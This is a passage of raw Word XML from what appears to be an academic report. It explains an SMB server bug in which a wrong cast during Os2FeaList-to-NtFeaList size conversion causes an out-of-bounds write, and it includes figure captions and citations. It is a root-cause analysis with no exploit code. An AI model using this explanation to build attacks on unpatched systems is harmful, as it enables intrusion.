      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E93B8A4" w14:textId="380EEDCB" w:rsidR="007B0FCF" w:rsidRDefault="007B0FCF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007B0FCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0042A779" wp14:editId="434E683F">
            <wp:extent cx="5467350" cy="2810510"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="2794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rotWithShape="1">
                    <a:blip r:embed="rId33"/>
                    <a:srcRect l="2642" r="1961" b="-6"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5467677" cy="2810678"/>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FC54842" w14:textId="24536C4C" w:rsidR="007B0FCF" w:rsidRDefault="007B0FCF" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc111363583"/>
      <w:bookmarkStart w:id="78" w:name="_Toc111363720"/>
      <w:bookmarkStart w:id="79" w:name="_Toc111981744"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Logic of Size Calculation of conversion between 0s2FeaList and NtFeaList Structures </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMTQzMmQ1ODQtOTMyNC00OWY2LTk3NjctNzNhZmQ2ODQ0NTcx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
          <w:id w:val="-1231605793"/>
          <w:placeholder>
            <w:docPart w:val="38BB14F76EB644EABEDDE5CA215E676A"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="30E4F990" w14:textId="5B46D6A3" w:rsidR="007B0FCF" w:rsidRDefault="007B0FCF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A51670" w14:textId="034142FA" w:rsidR="007B0FCF" w:rsidRDefault="007B0FCF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>It should be noted that there is no restriction of SMB packet size in ‘SizeofListInBytes’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0810708B" w14:textId="4445A97F" w:rsidR="00D20742" w:rsidRDefault="00D20742" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>‘Srv0s2FeaToNT’ is where the 0s2Fea record is converted to a NtFea record. It is larger than the 0s2Fea record as it contains the extra field ‘NextEntryOffset’ plus an alignment of 4 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68554C81" w14:textId="4CD2E845" w:rsidR="008A1630" w:rsidRDefault="004654DC" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The function containing the wrong casting </w:t>
      </w:r>
      <w:r w:rsidR="008A1630">
        <w:t>in the function ‘Srv0s2FeaListSizeToNt’ during the second shrinking (‘SizeOfListInBytes’ in 0s2FeaList) leads to a small buffer (NtFeaList) together with large data (out of buffer boundary) which continue</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="008A1630">
        <w:t xml:space="preserve"> after conversion in the ‘SizeOfListInBytes’ as the bug enlarges it rather than shrinking it</w:t>
      </w:r>
      <w:r w:rsidR="00FD319F">
        <w:t xml:space="preserve"> and the remainder dictates </w:t>
      </w:r>
      <w:r>
        <w:t>the amount of</w:t>
      </w:r>
      <w:r w:rsidR="00FD319F">
        <w:t xml:space="preserve"> records (bytes)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="00FD319F">
        <w:t xml:space="preserve"> should be converted to NtFea from 0s2Fea. It should be noted that the NtFeaList buffer (NtFeaListSize) has performed the correct calculation to convert the NtFeaList from the 0s2FeaList. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D611EA" w14:textId="794FF306" w:rsidR="00FD319F" w:rsidRDefault="001961C3" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In the case of a ‘SizeOfListInBytes’ greater than 2</w:t>
      </w:r>
      <w:r w:rsidRPr="001961C3">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00FD319F">
        <w:t xml:space="preserve">n Out of Bound write is caused because the updated value of ‘SizeOfListInBytes’ is bigger than the buffer size. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B224C" w14:textId="4E57FA17" w:rsidR="001961C3" w:rsidRDefault="001961C3" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> illustrates a </w:t>
      </w:r>
      <w:r w:rsidR="00A920C7">
        <w:t>normal conversion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scenario without and with the bug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F478557" w14:textId="77777777" w:rsidR="001961C3" w:rsidRDefault="001961C3" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76772896" w14:textId="2AE755F9" w:rsidR="001961C3" w:rsidRDefault="00B03EDB" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251879424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07D9FBA4" wp14:editId="59F10A65">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2895600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4168140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="441960" cy="182880"/>
                <wp:effectExtent l="0" t="38100" r="53340" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="760259241" name="Straight Arrow Connector 760259241"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="441960" cy="182880"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>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2D4CBF1" id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
                <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                <o:lock v:ext="edit" shapetype="t"/>
              </v:shapetype>
              <v:shape id="Straight Arrow Connector 760259241" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:228pt;margin-top:328.2pt;width:34.8pt;height:14.4pt;flip:y;z-index:2518794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" strokecolor="#c00000" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00EF7076">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251870208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BCFDB8C" wp14:editId="5C961465">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3302759</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3815687</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="122830" cy="320040"/>
                <wp:effectExtent l="0" t="0" r="10795" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="760259225" name="Rectangle 760259225"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="122830" cy="320040"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="31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8B1B82A" id="Rectangle 760259225" o:spid="_x0000_s1026" style="position:absolute;margin-left:260.05pt;margin-top:300.45pt;width:9.65pt;height:25.2pt;z-index:251870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" filled="f" strokecolor="#c00000" strokeweight=".25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A03248" w:rsidRPr="00EF7076">
        <w:rPr>
          <w:noProof/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BF8D4E3" wp14:editId="1D42EA97">
            <wp:extent cx="5356558" cy="4556502"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="294847896" name="Picture 29484789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847896" name="Picture 294847896" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5364526" cy="4563280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ABF662" w14:textId="1955C4BB" w:rsidR="00604E8A" w:rsidRDefault="00604E8A" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc111363584"/>
      <w:bookmarkStart w:id="81" w:name="_Toc111363721"/>
      <w:bookmarkStart w:id="82" w:name="_Toc111981745"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Conversion Values of 0s2FeaList to NtFeaList with and without Bug </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZDY5MzhiZjItNGE0NC00M2I1LWFlN2EtMDgyNzEzNDc3NTEz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
          <w:id w:val="1972630814"/>
          <w:placeholder>
            <w:docPart w:val="74F0758DDAFD4E3C88E9D9600A65680A"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="7125FC41" w14:textId="77777777" w:rsidR="00604E8A" w:rsidRPr="00604E8A" w:rsidRDefault="00604E8A" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C4ED036" w14:textId="399F5647" w:rsidR="00290B35" w:rsidRDefault="00290B35" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Function’s pseudo code can be found in Appendix </w:t>
      </w:r>
      <w:r w:rsidR="002F7CF9">
        <w:t>1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653DAF28" w14:textId="57E1B65A" w:rsidR="00D20742" w:rsidRDefault="00D20742" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709" w:firstLine="11"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00106E42">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> illustrates the SMB packet before shrinkage</w:t>
      </w:r>
      <w:r w:rsidR="00E84D9A">
        <w:t xml:space="preserve"> where it can be seen the SMB_FEA is out of range</w:t>
      </w:r>
      <w:r w:rsidR="00106E42">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D19647F" w14:textId="756C9DCC" w:rsidR="00D20742" w:rsidRDefault="000A4BCF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000A4BCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62EE8E59" wp14:editId="038B2053">
            <wp:extent cx="5731510" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="54" name="Picture 54"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A picture containing table&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2095500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1341BB31" w14:textId="057984B9" w:rsidR="00604E8A" w:rsidRDefault="00604E8A" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc111363585"/>
      <w:bookmarkStart w:id="84" w:name="_Toc111363722"/>
      <w:bookmarkStart w:id="85" w:name="_Toc111981746"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: SMB Packet Before Shrinkage </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZmMxMTE1YzYtNzZiYy00MWQ4LTk4MjktZGEyODhlZmZmMGRk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
          <w:id w:val="-1305464389"/>
          <w:placeholder>
            <w:docPart w:val="5CEE3EB748284E55992025BAACA04193"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="60069A88" w14:textId="16949807" w:rsidR="00A920C7" w:rsidRPr="00A920C7" w:rsidRDefault="00A920C7" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C04140C" w14:textId="418195AB" w:rsidR="00D20742" w:rsidRDefault="00D20742" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>The size of ‘SizeOfListInBytes’ after shrinkage is below 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20742">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00214014">
        <w:t xml:space="preserve"> It can also be seen that the </w:t>
      </w:r>
      <w:r w:rsidR="000A4BCF">
        <w:t>far-right</w:t>
      </w:r>
      <w:r w:rsidR="00214014">
        <w:t xml:space="preserve"> SMB_FEA is not related to SMB-FEA_List.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25582AA6" w14:textId="22C81CA3" w:rsidR="00D20742" w:rsidRDefault="006E3FEE" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E3FEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71FF56A7" wp14:editId="05F41063">
            <wp:extent cx="5709285" cy="2087142"/>
            <wp:effectExtent l="19050" t="19050" r="24765" b="2794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343" t="1113" b="1658"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5711814" cy="2088067"/>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5AF360C" w14:textId="1F4A2DAD" w:rsidR="00604E8A" w:rsidRPr="00604E8A" w:rsidRDefault="00604E8A" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc111363586"/>
      <w:bookmarkStart w:id="87" w:name="_Toc111363723"/>
      <w:bookmarkStart w:id="88" w:name="_Toc111981747"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: SizeOfListInBytes after shrinkage below 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00604E8A">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fOTRmYTUzNzgtOTIzMS00ZDllLWIzMzUtOWRiNGQ5MDMxYmMx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
          <w:id w:val="-1978516693"/>
          <w:placeholder>
            <w:docPart w:val="3380AB1E226A424DBE9F42DA045327AA"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="116793E6" w14:textId="77777777" w:rsidR="00604E8A" w:rsidRPr="00604E8A" w:rsidRDefault="00604E8A" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14893025" w14:textId="24EB9144" w:rsidR="00D20742" w:rsidRDefault="00D20742" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709" w:firstLine="11"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t xml:space="preserve">23 </w:t>
      </w:r>
      <w:r>
        <w:t>sets out how the size of ‘SizeOfListInBytes’</w:t>
      </w:r>
      <w:r w:rsidR="008A1630">
        <w:t xml:space="preserve"> is above 2</w:t>
      </w:r>
      <w:r w:rsidR="008A1630" w:rsidRPr="00D20742">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="008A1630">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A1630">
        <w:t>after the shrinking (after the bug comes into play).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4331B523" w14:textId="0A1AEDA8" w:rsidR="008A1630" w:rsidRDefault="003831A8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003831A8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="461BF6F6" wp14:editId="5E71B549">
            <wp:extent cx="5731510" cy="2018030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="59" name="Picture 59"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A picture containing graphical user interface&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2018030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7457BC1C" w14:textId="07CD55F3" w:rsidR="00E0580D" w:rsidRDefault="004B5D81" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc111363587"/>
      <w:bookmarkStart w:id="90" w:name="_Toc111363724"/>
      <w:bookmarkStart w:id="91" w:name="_Toc111981748"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: SizeOfListInBytes after shrinkage above 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00604E8A">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMGVlMTY5MWUtNzA0ZC00YjE3LThhNjEtM2MzYjNkMzRmZDEx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
          <w:id w:val="-366608848"/>
          <w:placeholder>
            <w:docPart w:val="686BF089BED3442EABBADBA36EF2E909"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="7C86EEB6" w14:textId="749BE714" w:rsidR="00A03248" w:rsidRDefault="00A03248" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766602D5" w14:textId="66549C61" w:rsidR="00D20742" w:rsidRDefault="002B61C1" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc113190707"/>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003F0C44">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00072EBE">
        <w:t xml:space="preserve">(B) </w:t>
      </w:r>
      <w:r>
        <w:t>Wrong Parsing Bug</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
